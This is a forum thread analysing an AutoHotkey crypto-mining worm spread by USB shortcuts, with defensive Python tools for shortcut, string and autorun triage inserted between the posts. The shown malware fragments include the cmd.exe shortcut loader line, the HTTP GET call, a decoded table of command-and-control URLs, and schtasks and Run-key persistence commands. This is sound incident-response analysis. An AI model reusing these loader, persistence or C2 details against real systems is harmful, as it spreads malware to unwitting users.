I discovered that I was somehow infected with an AutoHotkey virus: I saw a strange folder in my Dropbox and eventually tracked it back to my computer at home, where I found AutoHotkey running (and set to run at startup).
I think it came via an infected USB drive: there were shortcut links on the disk (in every folder), and clicking on one of the links (which was named to look like a real file) installed the script plus AutoHotkey. Later it did the same thing to every directory on multiple drives.
I think I have removed all traces, but I am interested to know what it was doing. The person who wrote it clearly did some obfuscating of the source code, so I haven't been able to work it out. Can anyone help me?
Was it connecting to some server? Which one?
Of course, don't run the script yourself! The entire code is below.
Thanks,
Jason
Edit: Moderator edit to remove malicious code. A mirror of it can be found by Googling for the hash 5ae1c07477d7dc0d380c3bc3
Help understanding autohotkey virus
Re: Help understanding autohotkey virus
Interesting.... it seems to be an obfuscated script.
Do you know what it did?
Re: Help understanding autohotkey virus
I can already foresee someone hitting that convenient download button and running the script; you should probably do something about that.
Re: Help understanding autohotkey virus
1 - Duplicate post: https://autohotkey.com/boards/viewtopic.php?f=5&t=49727
2 - edit the code to comment it all - add /* at the top of the script
3 - or move the code to pastebin or something - in sections
Re: Help understanding autohotkey virus
I don't know what it did, that is what I am looking for help with.
All I know is that it was creating more .lnk files, which had this target:
C:\WINDOWS\system32\cmd.exe "/c start tatdhfzpcxwcbimdnliyx\tatdhfzpcxwcbimdnliyx.exe tatdhfzpcxwcbimdnliyx\tatdhfzpcxwcbimdnliyx.txt tat &exit"
The .exe is just a renamed AutoHotkey.exe, and the .txt is the file above.
I'm assuming that these lines:
f#ffiiifk#.Open(ffkkfii@@ii@("474554"), k@k#kkf@@jj#haku . "/" . f@f@@jj#haku#k#f@f() , true)
f#ffiiifk#.Send()
f#ffiiifk#.WaitForResponse()
are sending something to a website, but I have no idea which website or what it is sending.
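The shortcut target quoted above (cmd.exe launching a renamed AutoHotkey.exe with a .txt script) is something you can hunt for offline, without clicking anything. The following is an added example, not code from the thread or from the malware: it parses the Shell Link (.lnk) binary format far enough to read the relative path and command-line arguments, flags the loader pattern, and can walk a mounted drive. The two sample shortcuts are constructed in build_lnk(), and the heuristics (interpreter as target, an .exe handed a .txt/.ahk file, "start ... &exit") are my own choices.

```python
"""Offline triage of .lnk shortcuts from a suspect USB drive (added example).

Parses MS-SHLLINK just far enough to read the StringData fields, where the
relative target path and the command-line arguments live, then flags shortcuts
that use cmd.exe to launch an .exe with a .txt script argument. The sample
shortcuts are built by build_lnk() and are constructed, not taken from a drive.
"""
import os
import re
import struct

LNK_CLSID = bytes.fromhex("0114020000000000c000000000000046")  # {00021401-0000-0000-C000-000000000046}
HEADER_SIZE = 0x4C
# LinkFlags bits (MS-SHLLINK 2.1.1), lowest bit first
HAS_IDLIST, HAS_LINKINFO, HAS_NAME, HAS_RELPATH, HAS_WORKDIR, HAS_ARGS, HAS_ICON, IS_UNICODE = (1 << i for i in range(8))
# StringData sections appear in this fixed order, each present only if its flag is set
STRING_FIELDS = ((HAS_NAME, "name"), (HAS_RELPATH, "relative_path"), (HAS_WORKDIR, "working_dir"),
                 (HAS_ARGS, "arguments"), (HAS_ICON, "icon_location"))


def parse_lnk(data: bytes) -> dict:
    """Return the StringData fields of a .lnk blob; raise ValueError if it is not one."""
    if len(data) < HEADER_SIZE or struct.unpack_from("<I", data, 0)[0] != HEADER_SIZE or data[4:20] != LNK_CLSID:
        raise ValueError("not a Shell Link file")
    flags = struct.unpack_from("<I", data, 20)[0]
    pos = HEADER_SIZE
    if flags & HAS_IDLIST:      # LinkTargetIDList: uint16 IDListSize followed by the ItemIDs
        pos += 2 + struct.unpack_from("<H", data, pos)[0]
    if flags & HAS_LINKINFO:    # LinkInfo: uint32 LinkInfoSize covers the whole structure
        pos += struct.unpack_from("<I", data, pos)[0]
    fields = {}
    for bit, name in STRING_FIELDS:
        if not flags & bit:
            continue
        count = struct.unpack_from("<H", data, pos)[0]   # CountCharacters, no terminator
        pos += 2
        if flags & IS_UNICODE:
            fields[name] = data[pos:pos + 2 * count].decode("utf-16-le")
            pos += 2 * count
        else:
            fields[name] = data[pos:pos + count].decode("cp1252")
            pos += count
    return fields


INTERPRETER = re.compile(r"(cmd|powershell|wscript|cscript|mshta)\.exe\s*$", re.I)
EXE_WITH_SCRIPT = re.compile(r"(\S+\.exe)\s+(\S+\.(?:txt|ahk|vbs|js|ps1))", re.I)


def triage(fields: dict) -> list:
    """Heuristic reasons a shortcut looks like a loader; an empty list means nothing was flagged."""
    path = fields.get("relative_path", "")
    args = fields.get("arguments", "")
    reasons = []
    if INTERPRETER.search(path):
        reasons.append(f"target is a command interpreter: {path}")
    m = EXE_WITH_SCRIPT.search(args)
    if m:   # an .exe handed a text file: how a renamed AutoHotkey.exe gets its script
        reasons.append(f"arguments run {m.group(1)} with script file {m.group(2)}")
    if re.search(r"\bstart\b", args, re.I) and re.search(r"&\s*exit\b", args, re.I):
        reasons.append("'start ... &exit' detaches the payload and closes the cmd window")
    return reasons


def scan_drive(root: str) -> dict:
    """Walk a mounted (ideally read-only) drive; return {shortcut path: reasons} for flagged .lnk files."""
    hits = {}
    for dirpath, _, files in os.walk(root):
        for name in files:
            if not name.lower().endswith(".lnk"):
                continue
            full = os.path.join(dirpath, name)
            try:
                with open(full, "rb") as fh:
                    reasons = triage(parse_lnk(fh.read()))
            except (OSError, ValueError, UnicodeDecodeError):
                continue
            if reasons:
                hits[full] = reasons
    return hits


def build_lnk(relative_path: str, arguments: str = "") -> bytes:
    """Construct a minimal Unicode .lnk (no IDList, no LinkInfo) for offline testing."""
    flags = HAS_RELPATH | IS_UNICODE | (HAS_ARGS if arguments else 0)
    header = struct.pack("<I16sIIQQQIIIHHII", HEADER_SIZE, LNK_CLSID, flags, 0x20,
                         0, 0, 0,        # CreationTime, AccessTime, WriteTime
                         0, 0, 1,        # FileSize, IconIndex, ShowCommand (SW_SHOWNORMAL)
                         0, 0, 0, 0)     # HotKey, Reserved1, Reserved2, Reserved3
    body = b""
    for s in ([relative_path, arguments] if arguments else [relative_path]):
        body += struct.pack("<H", len(s)) + s.encode("utf-16-le")
    return header + body


# Constructed samples: the first mirrors the target quoted in the thread, the second is an ordinary shortcut.
SAMPLE_LOADER = build_lnk(
    r"..\..\..\Windows\System32\cmd.exe",
    r"/c start tatdhfzpcxwcbimdnliyx\tatdhfzpcxwcbimdnliyx.exe tatdhfzpcxwcbimdnliyx\tatdhfzpcxwcbimdnliyx.txt tat &exit",
)
SAMPLE_BENIGN = build_lnk(r"Holiday photos\IMG_0001.jpg")

if __name__ == "__main__":
    for label, blob in (("loader", SAMPLE_LOADER), ("benign", SAMPLE_BENIGN)):
        fields = parse_lnk(blob)
        print(label, fields, triage(fields) or "clean")
```

Real shortcuts usually also carry a LinkTargetIDList and a LinkInfo block with the absolute target path; the parser skips both by their declared sizes and only reports StringData, which is where the launcher arguments are. Run scan_drive() against the mount point of the stick from a machine that will not auto-execute anything on it.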
Re: Help understanding autohotkey virus
Run a debugger and monitor it; the same letters appear very often too. Wish I could help you more.
Re: Help understanding autohotkey virus
It looks like it's using what was called the dynamic obfuscator; also, in the code I've seen the string "downloading". Either it downloads the key to decode the script, or the key may be contained somewhere within the script itself.
Whoever owns the dynamic obfuscator might be able to reverse the process, but I don't know.
https://github.com/davidmalia/autohotkey-obfuscator
You could run Wireshark and see what IP address it's connecting to as well.
Re: Help understanding autohotkey virus
Xatmo97 wrote:
It looks like it's using what was called the dynamic obfuscator; also, in the code I've seen the string "downloading". Either it downloads the key to decode the script, or the key may be contained somewhere within the script itself.
Whoever owns the dynamic obfuscator might be able to reverse the process, but I don't know.
https://github.com/davidmalia/autohotkey-obfuscator
You could run Wireshark and see what IP address it's connecting to as well.

Good find! Is there a program to reverse what it does?
https://github.com/davidmalia/autohotke ... scated.ahk
Re: Help understanding autohotkey virus
Here are all the variables decoded (it took only a minute). I disabled the URLs, but these are the strings. It seems to be a crypto miner... it tries to disable some Windows security settings as well, it seems.
Sad.
25434F4D50555445524E414D4525 : %COMPUTERNAME%
25555345524E414D4525 : %USERNAME%
283F503C4E616D653E2E2A3F29 : (?P<Name>.*?)
2D646F776E6C6F6164 : -download
2D736372697074 : -script
2D736C656570 : -sleep
2D757064617465 : -update
2E657865 : .exe
2E65786520433A5C : .exe C:\
2E747874 : .txt
2F312F : /1/
3A213A : :!:
3A3A283F503C4E616D653E2E2A3F293A3A : ::(?P<Name>.*?)::
4142434445464748494A4B4C4D4E4F505152535455565758595A6162636465666768696A6B6C6D6E6F707172737475767778797A30313233343536373839 : ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789
416E7469566972757350726F64756374 : AntiVirusProduct
433A : C:
433A5C : C:\
4552524F52 : ERROR
474554 : GET
484B4355 : HKCU
5245475F535A : REG_SZ
536372697074696E672E46696C6553797374656D4F626A656374 : Scripting.FileSystemObject
53656C656374202A2066726F6D2057696E33325F50726F63657373 : Select * from Win32_Process
536F6674776172655C4D6963726F736F66745C57696E646F77735C43757272656E7456657273696F6E5C52756E : Software\Microsoft\Windows\CurrentVersion\Run
556E6B6E6F776E : Unknown
575363726970742E5368656C6C : WScript.Shell
57696E33325F4F7065726174696E6753797374656D : Win32_OperatingSystem
57696E487474702E57696E48747470526571756573742E352E31 : WinHttp.WinHttpRequest.5.1
5C : \
5C2452454359434C452E42494E : \$RECYCLE.BIN
61 : a
6123 : a#
6140 : a@
62 : b
6223 : b#
6240 : b@
63 : c
6323 : c#
6340 : c@
6363 : cc
636D642E657865 : cmd.exe
636F756C646E7420636F6E6E65637420746F20 : couldnt connect to
636F756C646E742066696E6420636F6D6D616E6420696E20 : couldnt find command in
637075636865636B65722E657865 : cpuchecker.exe
637075636865636B657233322E657865 : cpuchecker32.exe
64 : d
6423 : d#
6440 : d@
6464 : dd
646F776E6C6F61642D : download-
646F776E6C6F6164696E672075706461746520 : downloading update
65 : e
6523 : e#
6540 : e@
6565 : ee
66 : f
6623 : f#
6640 : f@
6666 : ff
67 : g
6723 : g#
6740 : g@
67657420636F6D6D616E64 : get command
6767 : gg
68 : h
6823 : h#
6840 : h@
6868 : hh
687474703A2F2F6E6577616C7068612E616C7068616E6F6F622E636F6D3A39383938 : http:// newalpha.alphanoob.c*m:9898
687474703A2F2F6E6577616C7068612E616C7068616E6F6F622E636F6D3A39393939 : http:// newalpha.alphanoob.c*m:9999
687474703A2F2F6E6577616C7068612E73757065722D67616D657A65722E636F6D3A39333333 : http:// newalpha. super-gamezer.c*m:9333
687474703A2F2F6E6F6F626D696E65722E7075626C6963766D2E636F6D3A39383938 : http:// noobminer .publicvm. c*m:9898
687474703A2F2F7375706572616C7068612E6E65776D696E6572736167652E636F6D3A33333333 : http:// superalpha. newminersage.c*m:3333
687474703A2F2F7375706572616C7068612E7261646E65776167652E636F6D3A39383938 : http:// superalpha. radnewage. c*m:9898
69 : i
6923 : i#
6940 : i@
6969 : ii
6A : j
6A23 : j#
6A40 : j@
6A6A : jj
6B : k
6B23 : k#
6B40 : k@
6B6B : kk
6C : l
6C23 : l#
6C40 : l@
6C697665776F726B65722E657865 : liveworker.exe
6C6C : ll
6D : m
6D23 : m#
6D40 : m@
6D6D : mm
6E : n
6E23 : n#
6E40 : n@
6E6E : nn
6E6F76612E657865 : nova.exe
6F : o
6F23 : o#
6F40 : o@
6F6F : oo
70 : p
7023 : p#
7040 : p@
7070 : pp
71 : q
7123 : q#
7140 : q@
7171 : qq
72 : r
7223 : r#
7240 : r@
726164 : rad
7272 : rr
73 : s
7323 : s#
7340 : s@
7363687461736B73202F637265617465202F7363206D696E757465202F6D6F2031202F746E : schtasks /create /sc minute /mo 1 /tn
7363687461736B732E657865 : schtasks.exe
7363726970742D : script-
736C6565702D : sleep-
736C656570696E6720 : sleeping
737065656475702E657865 : speedup.exe
7373 : ss
73747265616D65722E657865 : streamer.exe
7375706572636865636B65722E657865 : superchecker.exe
73797374656D666978 : systemfix
74 : t
7423 : t#
7440 : t@
7474 : tt
75 : u
7523 : u#
7540 : u@
7570646174652D : update-
75706461746573656C662D : updateself-
7575 : uu
76 : v
7623 : v#
7640 : v@
7676 : vv
77 : w
7723 : w#
7740 : w@
77696E6D676D74733A : winmgmts:
77696E6D676D74733A5C5C : winmgmts:\\
77696E6D676D74733A5C5C6C6F63616C686F73745C726F6F745C736563757269747963656E74657232 : winmgmts:\\localhost\root\securitycenter2
7777 : ww
78 : x
7823 : x#
7840 : x@
7878 : xx
787878 : xxx
79 : y
7923 : y#
7940 : y@
7979 : yy
7A : z
7A23 : z#
7A40 : z@
7A7A : zz
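The table above is what you get once you notice that every string in the script is a hex literal fed through one decoder function (the ffkkfii@@ii@("474554") in the quoted .Open() call is "GET"). Below is an added example of doing that statically, in Python, so nobody has to run the sample: it pulls the literals out of the script text, decodes them, annotates each line with its decoded values, tags the indicators a responder cares about (C2 URLs, the Run key, schtasks, the WMI SecurityCenter2 query) and defangs URLs for reporting. This is my code, not the obfuscator's or the malware's; SAMPLE_SCRIPT is a constructed fragment shaped like the three posted lines, with its hex literals taken from the decoded table above, and the indicator patterns are my own.

```python
"""Statically decode the hex string literals of an obfuscated AutoHotkey script (added example).

The obfuscator stores every string as a hex literal and decodes it at run time
through a helper. This extracts the literals from the text instead, decodes them,
tags the interesting ones and defangs URLs. SAMPLE_SCRIPT is constructed.
"""
import re
from typing import Optional

HEX_LITERAL = re.compile(r'"((?:[0-9A-Fa-f]{2})+)"')   # even-length hex inside double quotes
URL = re.compile(r"https?://[^\s\"']+", re.I)

# (pattern over the decoded text, label); several labels can apply to one string
INDICATORS = (
    (re.compile(r"^https?://", re.I), "network: C2/update server"),
    (re.compile(r"CurrentVersion\\Run$", re.I), "persistence: Run key"),
    (re.compile(r"^schtasks\b", re.I), "persistence: scheduled task"),
    (re.compile(r"securitycenter2|AntiVirusProduct", re.I), "recon: WMI SecurityCenter2 (installed AV)"),
    (re.compile(r"Win32_(Process|OperatingSystem)", re.I), "recon: WMI query"),
    (re.compile(r"%COMPUTERNAME%|%USERNAME%", re.I), "recon: host fingerprint"),
    (re.compile(r"\$RECYCLE\.BIN", re.I), "staging: hidden drive folder"),
    (re.compile(r"\.exe$", re.I), "payload: executable name"),
)


def decode_hex(literal: str) -> Optional[str]:
    """Hex -> text, or None when the bytes are not printable ASCII (so not really a string)."""
    try:
        text = bytes.fromhex(literal).decode("ascii")
    except (ValueError, UnicodeDecodeError):
        return None
    return text if text.isprintable() else None


def defang(text: str) -> str:
    """Make URLs safe to paste into a report: http -> hxxp, dots -> [.]"""
    return URL.sub(lambda m: m.group(0).replace("http", "hxxp", 1).replace(".", "[.]"), text)


def tag(text: str) -> list:
    return [label for pat, label in INDICATORS if pat.search(text)]


def extract_strings(script: str) -> dict:
    """Map every decodable hex literal (upper-cased) to its plain decoded text."""
    out = {}
    for lit in HEX_LITERAL.findall(script):
        text = decode_hex(lit)
        if text is not None:
            out[lit.upper()] = text
    return out


def annotate(script: str) -> str:
    """Return the script with '; -> decoded' comments appended to lines holding hex literals."""
    lines = []
    for line in script.splitlines():
        decoded = [t for t in map(decode_hex, HEX_LITERAL.findall(line)) if t is not None]
        lines.append(line + ("   ; -> " + " | ".join(defang(t) for t in decoded) if decoded else ""))
    return "\n".join(lines)


def report(script: str) -> list:
    """[(hex, defanged text, tags)] for every decoded literal that matched an indicator."""
    return [(h, defang(t), tag(t)) for h, t in sorted(extract_strings(script).items()) if tag(t)]


# Constructed fragment in the shape of the posted lines; literals come from the decoded table.
SAMPLE_SCRIPT = r'''
f#ffiiifk# := ComObjCreate(ffkkfii@@ii@("57696E487474702E57696E48747470526571756573742E352E31"))
k@k#kkf@@jj#haku := ffkkfii@@ii@("687474703A2F2F6E6577616C7068612E616C7068616E6F6F622E636F6D3A39383938")
f#ffiiifk#.Open(ffkkfii@@ii@("474554"), k@k#kkf@@jj#haku . "/" . f@f@@jj#haku#k#f@f() , true)
f#ffiiifk#.Send()
f#ffiiifk#.WaitForResponse()
a@a#b := ffkkfii@@ii@("536F6674776172655C4D6963726F736F66745C57696E646F77735C43757272656E7456657273696F6E5C52756E")
b@b#c := ffkkfii@@ii@("7363687461736B73202F637265617465202F7363206D696E757465202F6D6F2031202F746E")
c@c#d := ffkkfii@@ii@("77696E6D676D74733A5C5C6C6F63616C686F73745C726F6F745C736563757269747963656E74657232")
d@d#e := ffkkfii@@ii@("61") . ffkkfii@@ii@("3A213A")
'''

if __name__ == "__main__":
    print(annotate(SAMPLE_SCRIPT))
    for _, text, tags in report(SAMPLE_SCRIPT):
        print(f"{text:70s} {', '.join(tags)}")
```

The printable-ASCII check is what keeps ordinary numeric strings such as "1234" from being mistaken for encoded text; anything that does not decode cleanly is left alone. The single-letter literals ("61" is "a", and so on) are the alphabet the obfuscator uses to build its random identifiers, which is why the decoded table is full of them.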
Re: Help understanding autohotkey virus
To moderators: if you approve the decoded strings post above, you can delete the script code from the forum; no need to help other bad people by keeping the code on the forum.
Re: Help understanding autohotkey virus
I wrote a script to deobfuscate the malware, though I won't share it here.
It's a neat piece of software though the code is pretty sloppy. It's definitely designed for a bitcoin mining botnet. However, it could be updated to do something else in the future.
Some of the things it does:
- Registers a scheduled task to re-launch the script every minute
- Installs a registry key to launch the script on startup
- Fingerprints the machine using the boot drive's serial code, the operating system version number A_OSVersion, and the OS version string (e.g. "Windows 7 Home Premium")
- Collects usage analytics, reporting things such as OS version, AntiVirus version, and whether the payload(s) were able to be run successfully
- It has automatic updates
- It scans the system for external drives to propagate to, like a worm
- To some extent, it randomizes the script obfuscation on start
Edited to add: These are probably the processes you should be looking out for; they seem to be the actual payload of the script.
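The two persistence mechanisms listed above (a Run key and a scheduled task firing every minute, both re-launching a renamed AutoHotkey.exe with a .txt script) are what to check on a host you suspect. The following is an added example in Python, not the malware's code or anything from the thread: classify_autorun() scores any autorun command line against that pattern, parse_schtasks_csv() reads the output of `schtasks /query /fo CSV /v`, and collect_autoruns() wires both to the live system on Windows. SAMPLE_ENTRIES and SAMPLE_SCHTASKS_CSV are constructed (the paths, the value name "systemfix" and the Defrag task are illustrative), the "trusted directory" and "exe given a .txt/.ahk argument" heuristics are mine, and the CSV column names "TaskName" and "Task To Run" are assumed to match what schtasks prints.

```python
"""Hunt autorun entries that re-launch a renamed AutoHotkey.exe (added example).

Run key values (HKCU/HKLM) and scheduled-task actions are scored against one
pattern: an .exe handed a .txt/.ahk file as its argument, typically from a
user-writable directory. Samples below are constructed.
"""
import csv
import io
import re
import subprocess
import sys

RUN_KEY = r"Software\Microsoft\Windows\CurrentVersion\Run"
# an .exe given a .txt/.ahk file as its argument (AutoHotkey runs whatever script it is handed)
EXE_WITH_SCRIPT = re.compile(r'"?([^"\s]+\.exe)"?\s+"?([^"\s]+\.(?:txt|ahk))"?', re.I)
TRUSTED_DIR = re.compile(r"^(%windir%|%SystemRoot%|[A-Z]:\\(Windows|Program Files( \(x86\))?))\\", re.I)


def classify_autorun(command: str) -> list:
    """Reasons an autorun command looks like a script-interpreter loader; [] when nothing trips."""
    reasons = []
    m = EXE_WITH_SCRIPT.search(command)
    if m:
        exe, script = m.groups()
        base = exe.rsplit("\\", 1)[-1]
        reasons.append(f"{base} is launched with script file {script} (renamed interpreter?)")
        if not TRUSTED_DIR.match(exe):
            reasons.append(f"executable lives outside Windows/Program Files: {exe}")
    if re.search(r"cmd\.exe.*\bstart\b", command, re.I):
        reasons.append("cmd.exe /c start used as a launcher")
    return reasons


def parse_schtasks_csv(text: str) -> list:
    """[('task:<name>', '<command>')] from `schtasks /query /fo CSV /v` output.

    The verbose CSV repeats its header row per task folder, so header rows are skipped."""
    out = []
    for row in csv.DictReader(io.StringIO(text)):
        name, cmd = row.get("TaskName", ""), row.get("Task To Run", "")
        if name == "TaskName" or not cmd:
            continue
        out.append((f"task:{name}", cmd))
    return out


def windows_run_keys() -> list:
    """[('<hive>\\...\\Run\\<value>', '<command>')] for HKCU and HKLM (Windows only)."""
    import winreg  # imported here so the module still loads on non-Windows hosts
    entries = []
    for hive, label in ((winreg.HKEY_CURRENT_USER, "HKCU"), (winreg.HKEY_LOCAL_MACHINE, "HKLM")):
        try:
            key = winreg.OpenKey(hive, RUN_KEY)
        except OSError:
            continue
        index = 0
        while True:
            try:
                value_name, value, _ = winreg.EnumValue(key, index)
            except OSError:     # ERROR_NO_MORE_ITEMS ends the enumeration
                break
            entries.append((f"{label}\\{RUN_KEY}\\{value_name}", str(value)))
            index += 1
    return entries


def collect_autoruns() -> list:
    """Live collection: Run keys plus every scheduled task's action (Windows only)."""
    if sys.platform != "win32":
        raise RuntimeError("live collection needs Windows; feed exported data to triage_entries() instead")
    result = subprocess.run(["schtasks", "/query", "/fo", "CSV", "/v"], capture_output=True, text=True, check=True)
    return windows_run_keys() + parse_schtasks_csv(result.stdout)


def triage_entries(entries: list) -> dict:
    """{entry name: reasons} for every autorun that trips a heuristic."""
    return {name: classify_autorun(cmd) for name, cmd in entries if classify_autorun(cmd)}


# Constructed samples modelled on the behaviour described in the thread.
SAMPLE_ENTRIES = [
    (r"HKCU\Software\Microsoft\Windows\CurrentVersion\Run\systemfix",
     r"C:\Users\user\tatdhfzpcxwcbimdnliyx\tatdhfzpcxwcbimdnliyx.exe C:\Users\user\tatdhfzpcxwcbimdnliyx\tatdhfzpcxwcbimdnliyx.txt"),
    (r"HKCU\Software\Microsoft\Windows\CurrentVersion\Run\OneDrive",
     r'"C:\Users\user\AppData\Local\Microsoft\OneDrive\OneDrive.exe" /background'),
]
SAMPLE_SCHTASKS_CSV = (
    '"HostName","TaskName","Next Run Time","Status","Task To Run","Schedule Type"\n'
    '"DESKTOP","\\systemfix","N/A","Ready","C:\\Users\\user\\tatdhfzpcxwcbimdnliyx\\tatdhfzpcxwcbimdnliyx.exe '
    'C:\\Users\\user\\tatdhfzpcxwcbimdnliyx\\tatdhfzpcxwcbimdnliyx.txt","Minute"\n'
    '"DESKTOP","\\Microsoft\\Windows\\Defrag\\ScheduledDefrag","N/A","Ready","%windir%\\system32\\defrag.exe -c -h -o -$","Weekly"\n'
)

if __name__ == "__main__":
    entries = collect_autoruns() if sys.platform == "win32" else SAMPLE_ENTRIES + parse_schtasks_csv(SAMPLE_SCHTASKS_CSV)
    for name, reasons in triage_entries(entries).items():
        print(name)
        for reason in reasons:
            print("   -", reason)
```

Because the loader here is a legitimately signed AutoHotkey.exe under a random name, hashing or signature checks will not catch it; what gives it away is the shape of the command line and where the binary lives, which is what the classifier keys on. Run it from an elevated prompt so the HKLM Run key and tasks owned by other users are readable.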
Re: Help understanding autohotkey virus
I've already reported those URLs to their host so that they may take them down.
Re: Help understanding autohotkey virus
GeekDude wrote:
I wrote a script to deobfuscate the malware, though I won't share it here.
It's a neat piece of software though the code is pretty sloppy. It's definitely designed for a bitcoin mining botnet. However, it could be updated to do something else in the future.
Some of the things it does:
As for what domains it connects to, those are here:
- Registers a scheduled task to re-launch the script every minute
- Installs a registry key to launch the script on startup
- Fingerprints the machine using the boot drive's serial code, the operating system version number A_OSVersion, and the OS version string (e.g. "Windows 7 Home Premium")
- Collects usage analytics, reporting things such as OS version, AntiVirus version, and whether the payload(s) were able to be run successfully
- It has automatic updates
- It scans the system for external drives to propagate to, like a worm
- To some extent, it randomizes the script obfuscation on start
Edited to add: These are probably the processes you should be looking out for; they seem to be the actual payload of the script.

Will you share it on your GitHub?
Re: Help understanding autohotkey virus
Thanks for all your help with the decoding, I appreciate it.
I don't see any of those processes running (nor AutoHotkey by itself), so hopefully it is gone!
Re: Help understanding autohotkey virus
If anyone wants a copy of the script I wrote to help decode the malware, send me a private message or contact me on IRC/Discord (see the link in my signature). It's pretty specific to that exact script, and wouldn't be of too much use for decoding other scripts.